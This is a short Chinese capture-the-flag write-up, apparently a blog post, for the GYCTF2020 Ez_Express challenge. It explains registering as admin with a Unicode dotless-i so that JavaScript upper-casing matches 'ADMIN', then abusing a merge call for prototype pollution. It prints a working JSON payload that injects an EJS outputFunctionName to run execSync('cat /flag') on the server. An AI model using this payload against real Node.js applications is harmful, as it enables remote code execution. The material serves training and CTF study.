[GYCTF2020]Ez_Express

知识点：

javascript大小写特性

js原型链污染

解题：

打开界面一个登录框，需要以ADMIN登录，www.zip下载源码：

不允许以 admin ADMIN 注册，但是后面存在

直接使用 admın 特殊字符注册即可，

又因为存在 merge 操作，所以存在原型链污染，审计的时候发现在 / 路由时，存在

一个未定义的属性，然后再最后在 info 路由进行了渲染，寻找原型链

https://evi0s.com/2019/08/30/expresslodashejs-%e4%bb%8e%e5%8e%9f%e5%9e%8b%e9%93%be%e6%b1%a1%e6%9f%93%e5%88%b0rce/

所以我们只需要在 / 进行污染，然后在访问 info 路径即可得到回显

payload：

{"lua":"a","__proto__":{"outputFunctionName":"a=1;return global.process.mainModule.constructor._load('child_process').execSync('cat /flag')//"},"Submit":""}

记得修改 content-Type ，最后访问 info 即可下载一个 flag 文件了

标签：info,__,9f%,e5%,Express,GYCTF2020,93%,原型,Ez
来源： https://blog.csdn.net/woshilnp/article/details/120263373